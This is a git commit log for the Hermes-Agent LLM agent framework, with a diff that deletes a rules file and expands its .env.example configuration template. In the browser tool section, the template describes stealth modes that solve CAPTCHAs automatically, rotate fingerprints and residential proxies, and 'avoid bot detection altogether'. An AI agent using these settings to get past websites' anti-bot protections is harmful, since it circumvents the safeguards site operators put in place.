ff776b57bf Remove outdated .cursorrules file and add comprehensive AGENTS.md documentation
- Deleted the .cursorrules file, which contained legacy information about the Hermes-Agent project structure and development environment.
- Introduced AGENTS.md, a detailed development guide for the Hermes Agent, outlining project structure, configuration management, CLI architecture, and agent functionality.
- Enhanced user guidance for setting up the development environment and utilizing the CLI effectively, including new commands for configuration management.
2026-02-02 19:45:42 -08:00
teknium1
3ee788dacc Implement configuration migration system and enhance CLI setup
- Introduced a configuration migration system to check for missing required environment variables and outdated config fields, prompting users for necessary inputs during updates.
- Enhanced the CLI with new commands for checking and migrating configuration, improving user experience by providing clear guidance on required settings.
- Updated the setup wizard to detect existing installations and offer quick setup options for missing configurations, streamlining the user onboarding process.
- Improved messaging throughout the CLI to inform users about the status of their configuration and any required actions.
2026-02-02 19:39:23 -08:00
teknium1
fef504f038 Refactor configuration file management and improve user feedback
- Updated the setup wizard and installation scripts to standardize the configuration file paths under ~/.hermes, enhancing clarity for users.
- Improved messaging in the CLI to clearly indicate where configuration files and data directories are located.
- Streamlined the creation of configuration files, ensuring they are easily accessible and organized within the new directory structure.
2026-02-02 19:34:56 -08:00
teknium1
bbb5776763 Enhance tool availability checks and user feedback in CLI
- Updated the CLI to include a new method for displaying warnings about disabled tools due to missing API keys.
- Integrated tool availability checks into the setup wizard and doctor commands, providing users with clear information on which tools are available and what is required for full functionality.
- Improved user prompts and feedback regarding API key configuration, emphasizing the importance of setting up keys for certain tools.
- Added detailed summaries of tool availability during setup and diagnostics, enhancing the overall user experience.
2026-02-02 19:28:27 -08:00
teknium1
e87bee9ccd Refactor setup wizard for improved API key and provider configuration
- Updated the setup wizard to clarify the OpenRouter API key requirement and enhance user prompts for API key input.
- Streamlined the main agent provider selection process, allowing users to choose between OpenRouter and custom endpoints with improved guidance.
- Renumbered setup steps for better organization and clarity, ensuring a smoother user experience during configuration.
- Enhanced error handling and user feedback for API configuration, emphasizing the importance of the OpenRouter key for certain tools.
2026-02-02 19:23:20 -08:00
teknium1
69a338610a Enhance repository cloning logic in install script
- Updated the install script to attempt cloning via SSH first for private repositories, falling back to HTTPS if the SSH method fails.
- Added detailed error handling and user guidance for SSH key setup, improving the installation experience for users with private repositories.
2026-02-02 19:19:26 -08:00
teknium1
aa6394e94f Update install script to support SSH and HTTPS repository URLs
- Modified the install script to include separate variables for SSH and HTTPS repository URLs, enhancing flexibility for users during the cloning process.
- This change allows users to choose their preferred method of accessing the repository, improving the overall installation experience.
2026-02-02 19:19:12 -08:00
teknium1
ef409c6a24 Enhance repository cloning in install script
- Updated the install script to support both SSH and HTTPS cloning methods for the repository, improving flexibility for users with different access configurations.
- Added error handling and informative logging to guide users in case of cloning failures, particularly for private repositories requiring SSH key setup.
- Refactored the cloning logic to attempt SSH first, falling back to HTTPS if necessary, ensuring a smoother installation experience.
2026-02-02 19:19:07 -08:00
teknium1
da4167560f Enhance terminal backend selection in setup wizard
- Added platform detection to customize available terminal backend options based on the operating system (Linux, macOS, Windows).
- Updated terminal choices to include Singularity/Apptainer only for Linux users, with appropriate warnings for unsupported selections.
- Improved user prompts for Docker and local configurations to provide platform-specific guidance.
- Refactored backend selection logic to streamline the process and ensure accurate mapping of user choices to backend configurations.
2026-02-02 19:15:30 -08:00
teknium1
3488576bd8 Update terminal configuration and enhance CLI model management
- Changed default Docker, Singularity, and Modal images in configuration files to use "nikolaik/python-nodejs:python3.11-nodejs20" for improved compatibility.
- Updated the default model in the configuration to "anthropic/claude-sonnet-4.5" and adjusted related setup prompts for API provider configuration.
- Introduced a new CLI option for selecting a custom OpenAI-compatible endpoint, enhancing flexibility in model provider setup.
- Enhanced the prompt choice functionality to support arrow key navigation for better user experience in CLI interactions.
- Updated documentation in relevant files to reflect these changes and improve user guidance.
2026-02-02 19:13:41 -08:00
teknium1
619c72e566 Enhance CLI with multi-platform messaging integration and configuration management
- Updated CLI to load configuration from user-specific and project-specific YAML files, prioritizing user settings.
- Introduced a new command `/platforms` to display the status of connected messaging platforms (Telegram, Discord, WhatsApp).
- Implemented a gateway system for handling messaging interactions, including session management and delivery routing for cron job outputs.
- Added support for environment variable configuration and a dedicated gateway configuration file for advanced settings.
- Enhanced documentation in README.md and added a new messaging.md file to guide users on platform integrations and setup.
- Updated toolsets to include platform-specific capabilities for Telegram, Discord, and WhatsApp, ensuring secure and tailored interactions.
2026-02-02 19:01:51 -08:00
teknium1
a3ba41fce2 Implement cron job management system for scheduled tasks (similar to OpenAI's Pulse but the AI can also schedule jobs)
- Introduced a new cron job system allowing users to schedule automated tasks via the CLI, supporting one-time reminders and recurring jobs.
- Added commands for managing cron jobs: `/cron` to list jobs, `/cron add` to create new jobs, and `/cron remove` to delete jobs.
- Implemented job storage in `~/.hermes/cron/jobs.json` with output saved to `~/.hermes/cron/output/{job_id}/{timestamp}.md`.
- Enhanced the CLI and README documentation to include detailed usage instructions and examples for cron job management.
- Integrated cron job tools into the hermes-cli toolset, ensuring they are only available in interactive CLI mode.
- Added support for cron expression parsing with the `croniter` package, enabling flexible scheduling options.
2026-02-02 08:26:42 -08:00
teknium1
c935a604f8 Refactor TODO.md to reorganize task sections and update descriptions
- Renamed and reordered sections in the TODO list for clarity, moving "Interactive Clarifying Questions Tool" to section 5 and "Collaborative Problem Solving" to section 6.
- Removed outdated ideas related to task continuation hints and resource awareness, streamlining the focus on current development priorities.
- Enhanced the overall structure of the TODO list to better reflect ongoing and future tasks.
2026-02-02 01:25:03 -08:00
teknium1
e114f09f70 Implement reasoning extraction and enhance assistant message handling
- Added a new method `_extract_reasoning` to extract reasoning content from assistant messages, accommodating multiple formats from various providers.
- Updated message handling to ensure all assistant messages include reasoning content for API compatibility, preserving multi-turn reasoning context.
- Enhanced logging to capture reasoning details for debugging and analysis.
- Modified the TODO.md to reflect changes in planning and task management, emphasizing the need for structured task decomposition and progress tracking.
2026-02-01 22:48:18 -08:00
teknium1
9b4d9452ba Add context compression feature for long conversations
- Implemented automatic context compression to manage long conversations that approach the model's context limit.
- Configured the feature to summarize middle turns while protecting the first three and last four turns, ensuring important context is retained.
- Added configuration options in `cli-config.yaml` and environment variables for enabling/disabling compression and setting thresholds.
- Updated documentation in `README.md`, `cli.md`, and `.env.example` to explain the context compression functionality and its configuration.
- Enhanced the `cli.py` to load compression settings into environment variables, ensuring seamless integration with the CLI.
- Completed the implementation of context compression as outlined in the TODO list, marking it as a significant enhancement to conversation management.
2026-02-01 18:01:31 -08:00
teknium1
bbeed5b5d1 Enhance session logging and interactive sudo support
- Implemented automatic session logging, saving conversation trajectories to the `logs/` directory in JSON format, with each session having a unique identifier.
- Updated the CLI to display the session ID in the welcome banner for easy reference.
- Introduced an interactive sudo password prompt in CLI mode, allowing users to enter their password with a 45-second timeout, enhancing user experience during command execution.
- Documented session logging and interactive sudo features in `README.md`, `cli.md`, and `cli-config.yaml.example` for better user guidance.
2026-02-01 15:36:26 -08:00
teknium1
971ed2bbdf Implement sudo support across terminal environments
- Added support for sudo commands in local, Docker, Singularity, and SSH environments by introducing the `SUDO_PASSWORD` environment variable.
- Updated terminal tool configurations in `.env.example` and `cli-config.yaml.example` to document the new sudo functionality.
- Enhanced the command execution process to handle sudo commands gracefully, preventing hangs on interactive prompts and providing clear error messages when no password is configured.
- Updated `README.md` to include instructions for using sudo support and SSH backend configuration.
- Revised `TODO.md` to reflect the completion of the sudo feature and outline future enhancements.
2026-02-01 10:02:34 -08:00
Teknium
affc4e9a8f Update TODO.md 2026-02-01 02:05:03 -08:00
teknium1
3db83b6824 Revise TODO.md to introduce Subagent Architecture and Interactive Clarifying Questions Tool
- Updated the structure of the TODO list, renaming and expanding the "Context Management" section to "Subagent Architecture" with detailed problem and solution descriptions.
- Added a new section for "Interactive Clarifying Questions Tool," outlining the problem of agent assumptions and proposing a multiple-choice prompt tool for user interaction.
- Included implementation details and benefits for both features, enhancing clarity and direction for future development.
2026-02-01 02:02:32 -08:00
teknium1
9c8d707530 Update .gitignore to include additional ignored files
- Added 'images/' to the ignore list to prevent tracking of image files.
- Retained existing entries for private keys and CLI config to maintain security and privacy.
2026-02-01 01:33:59 -08:00
teknium1
8f5f99c22a Add new skills descriptions and enhance skills tool functionality
- Added detailed descriptions for new skills categories: Machine Learning Operations and Note Taking.
- Introduced a new Obsidian skill with commands for reading, listing, searching, creating, and appending notes.
- Enhanced the skills tool to load and display category descriptions from DESCRIPTION.md files, improving user guidance and discovery of available skills.
2026-02-01 01:32:21 -08:00
teknium1
32254d3010 Add skills guidance to system prompts in run_agent.py
- Introduced a default skills guidance prompt to assist the model in checking relevant skills before technical tasks.
- Updated the logic in AIAgent to auto-include skills guidance when skills tools are available, enhancing the model's contextual understanding during API calls.
2026-02-01 01:31:59 -08:00
teknium1
20f2875472 Implement browser session inactivity timeout and cleanup
- Updated `.env.example` to include `BROWSER_INACTIVITY_TIMEOUT` for auto-cleanup of inactive sessions.
- Enhanced `cli.py` to load the new inactivity timeout configuration into environment variables.
- Added background thread functionality in `browser_tool.py` to periodically clean up inactive browser sessions based on the configured timeout.
- Improved session management by tracking last activity timestamps and ensuring cleanup occurs when sessions exceed inactivity limits.
2026-01-31 21:42:15 -08:00
teknium
c360da4f35 Enhance documentation for CLI and tool integration
- Updated `.cursorrules` to provide a comprehensive overview of the interactive CLI, including its architecture, key components, and command handling.
- Expanded `README.md` to introduce the CLI features, quick start instructions, and detailed command descriptions for user guidance.
- Added `docs/cli.md` to document CLI usage, configuration, and animated feedback, ensuring clarity for users and developers.
- Revised `docs/tools.md` to include support for SSH backend in terminal tools, enhancing the documentation for terminal execution options.
2026-01-31 06:33:43 +00:00
teknium
bc76a032ba Add a claude code-like CLI
- Introduced `cli-config.yaml.example` to provide a template for configuring the CLI behavior, including model settings, terminal tool configurations, agent behavior, and toolsets.
- Created `cli.py` for an interactive terminal interface, allowing users to start the Hermes Agent with various options and toolsets.
- Added `hermes` launcher script for convenient CLI access.
- Updated `model_tools.py` to support quiet mode for suppressing output during tool initialization and execution.
- Enhanced logging in various tools to respect quiet mode, improving user experience by reducing unnecessary output.
- Added `prompt_toolkit` to `requirements.txt` for improved CLI interaction capabilities.
- Created `TODO.md` for future improvements and enhancements to the Hermes Agent framework.
2026-01-31 06:30:48 +00:00
teknium
8e986584f4 Update .gitignore to include private keys and CLI config
- Added patterns to ignore private key files (*.ppk, *.pem) and any files starting with 'privvy'.
- Included cli-config.yaml in the ignore list to prevent sensitive SSH paths from being tracked.
2026-01-31 06:28:39 +00:00
teknium
4b68d30b0e Moved "architecture" dir to "docs" for clarity 2026-01-30 07:54:51 +00:00
teknium
b292192467 Enhance documentation for skills system and project structure
- Expanded `.cursorrules` to include detailed sections on the skills system, outlining the directory structure, progressive disclosure pattern, and YAML frontmatter usage for skill files.
- Updated `README.md` to introduce skills tools, providing examples of usage and creation, along with a comprehensive overview of available skills functionalities.
- Enhanced `architecture/tools.md` to document the skills tools and their integration within the Hermes-Agent framework, ensuring clarity for developers and users.
2026-01-30 07:54:21 +00:00
teknium
f172f7d4aa Add skills tools and enhance model integration
- Introduced new skills tools: `skills_categories`, `skills_list`, and `skill_view` in `model_tools.py`, allowing for better organization and access to skill-related functionalities.
- Updated `toolsets.py` to include a new `skills` toolset, providing a dedicated space for skill tools.
- Enhanced `batch_runner.py` to recognize and validate skills tools during batch processing.
- Added comprehensive tool definitions for skills tools, ensuring compatibility with OpenAI's expected format.
- Created new shell script `test_skills_kimi.sh` for testing skills tool functionality with Kimi K2.5.
- Added example skill files demonstrating the structure and usage of skills within the Hermes-Agent framework, including `SKILL.md` for example and audiocraft skills.
- Improved documentation for skills tools and their integration into the existing tool framework, ensuring clarity for future development and usage.
2026-01-30 07:39:55 +00:00
teknium
8e8b6be690 Add timeout configuration for trajectory processing
- Updated `trajectory_compression.yaml` to include a new `per_trajectory_timeout` setting, allowing for a timeout of 300 seconds per trajectory. This enhancement helps prevent hanging on problematic entries during processing, improving overall reliability and efficiency in trajectory handling.
2026-01-30 07:34:58 +00:00
teknium
e8c6135a91 Update documentation for project structure and tool integration
- Expanded the `.cursorrules` file to include detailed sections on project structure, file dependency chain, and guidelines for adding new tools.
- Provided a comprehensive tool implementation pattern and outlined requirements for stateful tools and environment variables.
- Enhanced clarity on the agent loop and reasoning model support, ensuring better understanding for future development and contributions.
2026-01-30 07:34:12 +00:00
teknium
771cf41fea Update environment configuration and enhance terminal tool integration
- Modified `.env.example` to set the default terminal environment to 'singularity' and updated Docker and Singularity image references for better compatibility.
- Enhanced `run_mixed_tasks.sh` and `run_terminal_tasks.sh` scripts to utilize the new Singularity setup, including improved logging and cache directory management.
- Introduced functionality in `terminal_tool.py` to automatically build and cache SIF images from Docker URLs, streamlining the execution environment setup.
- Updated logging messages for clarity on image usage and cache directory paths.
2026-01-29 22:47:11 +00:00
teknium
7ea17bb957 Update environment configuration and enhance tool definitions
- Modified `.env.example` to set default terminal environment to 'local' and updated Docker, Singularity, and Modal image references to use 'python:3.11-slim'.
- Updated `package.json` to include Node.js engine requirements and modified post-install script for better user guidance.
- Enhanced `pyproject.toml` to reflect new dependencies and optional dependencies for modal and development environments.
- Improved `README.md` with additional setup instructions for Singularity and Node.js dependencies, along with clearer toolset documentation.
- Refactored `model_tools.py` to include new tool definitions and ensure consistency across toolsets.
- Updated architecture documentation to clarify tool structure and registration processes.
2026-01-29 22:36:07 +00:00
teknium
f8846f85a1 Add package.json and package-lock.json for project setup
- Created package.json to define project metadata, dependencies, and scripts for the Hermes-Agent.
- Added package-lock.json to lock dependency versions, ensuring consistent installations across environments.
- Included agent-browser as a dependency for enhanced tool-calling capabilities.
2026-01-29 22:23:17 +00:00
teknium
4c05ef0ba8 Enhance logging and tool initialization for improved performance
- Updated logging configuration in `run_agent.py` to suppress debug messages from additional third-party libraries, reducing noise in logs.
- Enhanced shell scripts for terminal tasks to utilize Singularity for containerized execution, including pre-build SIF image logic and improved logging.
- Refactored tool initialization in `mixture_of_agents_tool.py`, `vision_tools.py`, and `web_tools.py` to implement lazy loading of API clients, optimizing resource usage and error handling.
- Updated ephemeral system prompts in shell scripts to provide clearer guidance on task execution and resource usage.
2026-01-29 19:59:59 +00:00
teknium
5438b64e32 Add new shell scripts for various task runs
- Introduced `run_browser_tasks.sh` for executing browser-focused data generation tasks with specific guidelines for automation.
- Added `run_eval_glm4.7_newterm.sh` for evaluating terminal tasks using the GLM 4.7 model, including logging and configuration for terminal environments.
- Created `run_eval_terminal.sh` for terminal-only evaluations with Modal sandboxes, ensuring proper logging and environment setup.
- Developed `run_mixed_tasks.sh` for running mixed browser and terminal tasks, integrating capabilities for both environments.
- Implemented `run_terminal_tasks.sh` for terminal-focused data generation, with detailed instructions for task execution and logging.
- All scripts include timestamped logging for better tracking of task execution and outputs.
2026-01-29 06:11:12 +00:00
teknium
248acf715e Add browser automation tools and enhance environment configuration
- Introduced new browser automation tools in `browser_tool.py` for navigating, interacting with, and extracting content from web pages using the agent-browser CLI and Browserbase cloud execution.
- Updated `.env.example` to include new configuration options for Browserbase API keys and session settings.
- Enhanced `model_tools.py` and `toolsets.py` to integrate browser tools into the existing tool framework, ensuring consistent access across toolsets.
- Updated `README.md` with setup instructions for browser tools and their usage examples.
- Added new test script `test_modal_terminal.py` to validate Modal terminal backend functionality.
- Improved `run_agent.py` to support browser tool integration and logging enhancements for better tracking of API responses.
2026-01-29 06:10:24 +00:00
teknium
54ca0997ee Update .gitignore to include additional directories and files
- Added entries for `node_modules/`, `browser-use/`, and `agent-browser/` to prevent unnecessary files from being tracked.
- Updated `data/*` entry to `data/*` for consistency in ignoring data files.
- Ensured no newline at the end of the file for proper formatting.
2026-01-29 06:04:25 +00:00
teknium
b78076cac7 Enhance trajectory_compressor.py with new input options and sampling functionality
- Updated the main function to accept both single JSONL files and directories for compression.
- Added support for sampling a percentage of trajectories before compression.
- Improved usage documentation with detailed examples for various compression scenarios.
- Enhanced error handling for input validation and dry run mode.
- Streamlined output handling to manage temporary files during processing.
2026-01-29 06:04:13 +00:00
teknium
ba19d530ad Update environment configuration and enhance terminal tool integration
- Updated `.env.example` to include new API keys and configuration options for the mini-swe-agent backend, including support for local, Docker, and Modal environments.
- Added `.gitmodules` to include mini-swe-agent as a submodule for easier integration.
- Refactored `mini_swe_runner.py` to use the updated model format and default to OpenRouter for API calls.
- Enhanced `model_tools.py` to support the new terminal tool definitions and ensure compatibility with the mini-swe-agent backend.
- Updated `README.md` to reflect changes in setup instructions and environment variable configurations.
- Improved `terminal_tool.py` to manage execution environments and lifecycle, ensuring proper cleanup and error handling.
- Introduced `terminal_hecate.py` for executing commands on MorphCloud VMs, providing an alternative backend for terminal operations.
2026-01-23 12:26:53 +00:00
teknium
47555602d7 Add mini-swe-agent runner and trajectory compressor
- Introduced mini_swe_runner.py for executing tasks using mini-swe-agent environments (local, Docker, Modal) and outputting trajectories in Hermes format.
- Implemented trajectory_compressor.py to post-process agent trajectories, compressing them within a target token budget while preserving essential content.
- Added trajectory_compression.yaml configuration file for customizable compression settings.
- Created sample_and_compress.py script to download, sample, and compress trajectories from HuggingFace datasets.
- Enhanced logging and error handling across new modules for improved usability and debugging.
2026-01-23 00:52:46 +00:00
teknium
6eb76c7c1a Enhance batch processing and image generation tools
- Updated batch processing to include robust resume functionality by scanning completed prompts based on content rather than indices, improving recovery from failures.
- Implemented retry logic for image downloads with exponential backoff to handle transient failures effectively.
- Refined image generation tool to utilize the FLUX 2 Pro model, updating descriptions and parameters for clarity and consistency.
- Added new configuration scripts for GLM 4.7 and Imagen tasks, enhancing usability and logging capabilities.
- Removed outdated scripts and test files to streamline the codebase.
2026-01-18 10:11:59 +00:00
teknium
b32cc4b09d Refactor batch processing with rich progress tracking and update logging in AIAgent
- Replaced tqdm with rich for enhanced visual progress tracking in batch processing.
- Adjusted logging levels in AIAgent to suppress asyncio debug messages.
- Modified datagen script to reduce number of workers for improved performance.
2026-01-14 14:02:59 +00:00
teknium
6e3dbb8d8b Enhance batch processing with progress tracking and update AIAgent for OpenRouter detection
- Integrated tqdm for progress tracking in batch processing, replacing map with imap_unordered for improved performance.
- Added base_url attribute in AIAgent to facilitate OpenRouter detection.
2026-01-14 13:46:16 +00:00
teknium
b66c093316 add default datagen example script 2026-01-14 13:41:09 +00:00
teknium
13d360030f Enhance tool normalization and API integration across modules
- Introduced normalization functions for tool statistics and error counts to ensure consistent schema across all trajectory entries, facilitating compatibility with HuggingFace datasets.
- Updated batch processing to utilize normalized tool stats and error counts, improving data integrity.
- Refactored vision tools and mixture of agents tool to integrate with OpenRouter API, replacing Nous Research API references and updating model configurations.
- Enabled reasoning capabilities in API calls for enhanced response quality across various tools.
- Improved error handling and API key validation for OpenRouter integration.
2026-01-14 13:40:10 +00:00
teknium
66daebe88f Implement enhanced response handling and tool call validation in run_agent
- Added methods to check for meaningful content after <think> blocks and to retrieve messages up to the last complete assistant turn.
- Introduced retry logic for handling truncated responses and invalid JSON arguments in tool calls, with a maximum retry limit.
- Improved logging for invalid JSON and empty responses, ensuring better error tracking and handling.
- Updated the batch data generation script to adjust dataset file, batch size, and ephemeral system prompt for improved context management.
2026-01-10 13:04:43 +00:00
teknium
4071ba29da Enhance batch processing and tool validation
- Added support for tracking partial results and tool error counts in batch processing.
- Implemented filtering of corrupted entries during batch file combination based on valid tool names.
- Updated terminal tool to improve command execution and error handling, including retry logic for transient failures.
- Refactored model tools to use a simple terminal tool with no session persistence.
- Improved logging and error messages for invalid API responses and tool calls.
- Introduced chunked processing for large content in web tools to manage size limitations effectively.
2026-01-10 05:56:26 +00:00
Teknium
21f9e2df40 Merge pull request #14 from NousResearch/speed-upgrades
updates for stability and speed
2026-01-08 01:04:15 -08:00
Teknium
80d326310e Merge branch 'main' into speed-upgrades 2026-01-08 01:03:34 -08:00
Teknium
53fc705b13 Merge pull request #8 from NousResearch/update-snapshot-id
Update snapshot id for ipython
2026-01-08 01:00:24 -08:00
Teknium
d5af53888a Merge pull request #3 from NousResearch/architecture-planning
Architecture planning
2026-01-08 01:00:00 -08:00
Teknium
a7a37249f7 Merge branch 'main' into architecture-planning 2026-01-08 00:59:51 -08:00
teknium
6af6ff2a0a updates for stability and speed 2026-01-08 08:57:51 +00:00
Teknium
30ca282594 Merge pull request #11 from NousResearch/simplify-terminal
Add simple terminal
2025-11-22 02:26:01 -08:00
hjc-puro
0fbc0475f3 update snapshot id for ipython 2025-11-05 02:11:25 -05:00
Dakota
e5e77381f0 Made to be more descriptive from comments 2025-09-12 18:10:36 -05:00
Dakota
066514e2a9 add more architecture docs 2025-09-12 17:47:32 -05:00
Dakota
045a1737f8 - message graphs 2025-09-12 10:25:14 -05:00
866 changed files with 348979 additions and 3583 deletions

View File

@@ -1,23 +0,0 @@
Hermes-Agent is an agent harness for LLMs.
When building, the tool functionality is in the tools/ directory, where each specific tool (or in some cases, tools that are built for the same execution category or api) are placed in a script each their own.
Each tool is then consolidated in the model_tools.py file in the repo root.
There is also a way to consolidate sets of tools in toolsets.py for the agent to use.
The primary agent runner code is in run_agent, but other runners could be developed using the tools and framework.
Always ensure consistency between tools, the model_tools.py and toolsets.py when changing any of them, otherwise they could become desynced in a way that is detrimental to functionality.
The expected pathway for using API keys is to setup and place them in a .env file in the repo root.
Test scripts will be placed in tests/
The run_agent loop is setup to:
- Process the enabled toolsets to provide to the model,
- Pipe in a prompt or problem from the input to the agent,
- Loop the LLM each time it calls a tool, until the model decides no more tools are needed and provides a natural language response,
- Return that response.
There are additional caveats for logging, where we restructure the "tools" as a system prompt for storage later into a format that can be used and handled properly later.

View File

@@ -1,49 +1,277 @@
# Hermes Agent Environment Configuration
# Copy this file to .env and fill in your API keys
# Get API keys from the URLs listed below
# =============================================================================
# REQUIRED API KEYS
# LLM PROVIDER (OpenRouter)
# =============================================================================
# OpenRouter provides access to many models through one API
# All LLM calls go through OpenRouter - no direct provider keys needed
# Get your key at: https://openrouter.ai/keys
OPENROUTER_API_KEY=
# Anthropic API Key - Main agent model
# Get at: https://console.anthropic.com/
ANTHROPIC_API_KEY=
# Default model to use (OpenRouter format: provider/model)
# Examples: anthropic/claude-opus-4.6, openai/gpt-4o, google/gemini-3-flash-preview, zhipuai/glm-4-plus
LLM_MODEL=anthropic/claude-opus-4.6
# =============================================================================
# LLM PROVIDER (z.ai / GLM)
# =============================================================================
# z.ai provides access to ZhipuAI GLM models (GLM-4-Plus, etc.)
# Get your key at: https://z.ai or https://open.bigmodel.cn
GLM_API_KEY=
# GLM_BASE_URL=https://api.z.ai/api/paas/v4 # Override default base URL
# =============================================================================
# LLM PROVIDER (Kimi / Moonshot)
# =============================================================================
# Kimi Code provides access to Moonshot AI coding models (kimi-k2.5, etc.)
# Get your key at: https://platform.kimi.ai (Kimi Code console)
# Keys prefixed sk-kimi- use the Kimi Code API (api.kimi.com) by default.
# Legacy keys from platform.moonshot.ai need KIMI_BASE_URL override below.
KIMI_API_KEY=
# KIMI_BASE_URL=https://api.kimi.com/coding/v1 # Default for sk-kimi- keys
# KIMI_BASE_URL=https://api.moonshot.ai/v1 # For legacy Moonshot keys
# KIMI_BASE_URL=https://api.moonshot.cn/v1 # For Moonshot China keys
# =============================================================================
# LLM PROVIDER (MiniMax)
# =============================================================================
# MiniMax provides access to MiniMax models (global endpoint)
# Get your key at: https://www.minimax.io
MINIMAX_API_KEY=
# MINIMAX_BASE_URL=https://api.minimax.io/v1 # Override default base URL
# MiniMax China endpoint (for users in mainland China)
MINIMAX_CN_API_KEY=
# MINIMAX_CN_BASE_URL=https://api.minimaxi.com/v1 # Override default base URL
# =============================================================================
# TOOL API KEYS
# =============================================================================
# Firecrawl API Key - Web search, extract, and crawl
# Get at: https://firecrawl.dev/
FIRECRAWL_API_KEY=
# Nous Research API Key - Vision analysis and multi-model reasoning
# Get at: https://inference-api.nousresearch.com/
NOUS_API_KEY=
# Morph API Key - Terminal/command execution tools
# Get at: https://morph.so/
MORPH_API_KEY=
# FAL.ai API Key - Image generation
# Get at: https://fal.ai/
FAL_KEY=
# =============================================================================
# OPTIONAL API KEYS
# =============================================================================
# OpenAI API Key - Optional, for enhanced Hecate features
# Get at: https://platform.openai.com/
OPENAI_API_KEY=
# Honcho - Cross-session AI-native user modeling (optional)
# Builds a persistent understanding of the user across sessions and tools.
# Get at: https://app.honcho.dev
# Also requires ~/.honcho/config.json with enabled=true (see README).
HONCHO_API_KEY=
# =============================================================================
# OPTIONAL CONFIGURATION
# TERMINAL TOOL CONFIGURATION (mini-swe-agent backend)
# =============================================================================
# Backend type: "local", "singularity", "docker", "modal", or "ssh"
# Terminal backend is configured in ~/.hermes/config.yaml (terminal.backend).
# Use 'hermes setup' or 'hermes config set terminal.backend docker' to change.
# Supported: local, docker, singularity, modal, ssh
#
# Only override here if you need to force a backend without touching config.yaml:
# TERMINAL_ENV=local
# Terminal Tool Settings
HECATE_VM_LIFETIME_SECONDS=300
HECATE_DEFAULT_SNAPSHOT_ID=snapshot_p5294qxt
# Container images (for singularity/docker/modal backends)
# TERMINAL_DOCKER_IMAGE=nikolaik/python-nodejs:python3.11-nodejs20
# TERMINAL_SINGULARITY_IMAGE=docker://nikolaik/python-nodejs:python3.11-nodejs20
TERMINAL_MODAL_IMAGE=nikolaik/python-nodejs:python3.11-nodejs20
# Debug Logging (set to "true" to enable, logs saved to ./logs/)
# Working directory for terminal commands
# For local backend: "." means current directory (resolved automatically)
# For remote backends (ssh/docker/modal/singularity): use an absolute path
# INSIDE the target environment, or leave unset for the backend's default
# (/root for modal, / for docker, ~ for ssh). Do NOT use a host-local path.
# Usually managed by config.yaml (terminal.cwd) — uncomment to override
# TERMINAL_CWD=.
# Default command timeout in seconds
TERMINAL_TIMEOUT=60
# Cleanup inactive environments after this many seconds
TERMINAL_LIFETIME_SECONDS=300
# =============================================================================
# SSH REMOTE EXECUTION (for TERMINAL_ENV=ssh)
# =============================================================================
# Run terminal commands on a remote server via SSH.
# Agent code stays on your machine, commands execute remotely.
#
# SECURITY BENEFITS:
# - Agent cannot read your .env file (API keys protected)
# - Agent cannot modify its own code
# - Remote server acts as isolated sandbox
# - Can safely configure passwordless sudo on remote
#
# TERMINAL_SSH_HOST=192.168.1.100
# TERMINAL_SSH_USER=agent
# TERMINAL_SSH_PORT=22
# TERMINAL_SSH_KEY=~/.ssh/id_rsa
# =============================================================================
# SUDO SUPPORT (works with ALL terminal backends)
# =============================================================================
# If set, enables sudo commands by piping password via `sudo -S`.
# Works with: local, docker, singularity, modal, and ssh backends.
#
# SECURITY WARNING: Password stored in plaintext. Only use on trusted machines.
#
# ALTERNATIVES:
# - For SSH backend: Configure passwordless sudo on the remote server
# - For containers: Run as root inside the container (no sudo needed)
# - For local: Configure /etc/sudoers for specific commands
# - For CLI: Leave unset - you'll be prompted interactively with 45s timeout
#
# SUDO_PASSWORD=your_password_here
# =============================================================================
# MODAL CLOUD BACKEND (Optional - for TERMINAL_ENV=modal)
# =============================================================================
# Modal uses CLI authentication, not environment variables.
# Run: pip install modal && modal setup
# This will authenticate via browser and store credentials locally.
# No API key needed in .env - Modal handles auth automatically.
# =============================================================================
# BROWSER TOOL CONFIGURATION (agent-browser + Browserbase)
# =============================================================================
# Browser automation requires Browserbase cloud service for remote browser execution.
# This allows the agent to navigate websites, fill forms, and extract information.
#
# STEALTH MODES:
# - Basic Stealth: ALWAYS active (random fingerprints, auto CAPTCHA solving)
# - Advanced Stealth: Requires BROWSERBASE_ADVANCED_STEALTH=true (Scale Plan only)
# Browserbase API Key - Cloud browser execution
# Get at: https://browserbase.com/
BROWSERBASE_API_KEY=
# Browserbase Project ID - From your Browserbase dashboard
BROWSERBASE_PROJECT_ID=
# Enable residential proxies for better CAPTCHA solving (default: true)
# Routes traffic through residential IPs, significantly improves success rate
BROWSERBASE_PROXIES=true
# Enable advanced stealth mode (default: false, requires Scale Plan)
# Uses custom Chromium build to avoid bot detection altogether
BROWSERBASE_ADVANCED_STEALTH=false
# Browser session timeout in seconds (default: 300)
# Sessions are cleaned up after this duration of inactivity
BROWSER_SESSION_TIMEOUT=300
# Browser inactivity timeout - auto-cleanup inactive sessions (default: 120 = 2 min)
# Browser sessions are automatically closed after this period of no activity
BROWSER_INACTIVITY_TIMEOUT=120
# =============================================================================
# SESSION LOGGING
# =============================================================================
# Session trajectories are automatically saved to logs/ directory
# Format: logs/session_YYYYMMDD_HHMMSS_UUID.json
# Contains full conversation history in trajectory format for debugging/replay
# =============================================================================
# VOICE TRANSCRIPTION & OPENAI TTS
# =============================================================================
# Required for voice message transcription (Whisper) and OpenAI TTS voices.
# Uses OpenAI's API directly (not via OpenRouter).
# Named VOICE_TOOLS_OPENAI_KEY to avoid interference with OpenRouter.
# Get at: https://platform.openai.com/api-keys
VOICE_TOOLS_OPENAI_KEY=
# =============================================================================
# SLACK INTEGRATION
# =============================================================================
# Slack Bot Token - From Slack App settings (OAuth & Permissions)
# Get at: https://api.slack.com/apps
# SLACK_BOT_TOKEN=xoxb-...
# Slack App Token - For Socket Mode (App-Level Tokens in Slack App settings)
# SLACK_APP_TOKEN=xapp-...
# Slack allowed users (comma-separated Slack user IDs)
# SLACK_ALLOWED_USERS=
# WhatsApp (built-in Baileys bridge — run `hermes whatsapp` to pair)
# WHATSAPP_ENABLED=false
# WHATSAPP_ALLOWED_USERS=15551234567
# Email (IMAP/SMTP — send and receive emails as Hermes)
# For Gmail: enable 2FA → create App Password at https://myaccount.google.com/apppasswords
# EMAIL_ADDRESS=hermes@gmail.com
# EMAIL_PASSWORD=xxxx xxxx xxxx xxxx
# EMAIL_IMAP_HOST=imap.gmail.com
# EMAIL_IMAP_PORT=993
# EMAIL_SMTP_HOST=smtp.gmail.com
# EMAIL_SMTP_PORT=587
# EMAIL_POLL_INTERVAL=15
# EMAIL_ALLOWED_USERS=your@email.com
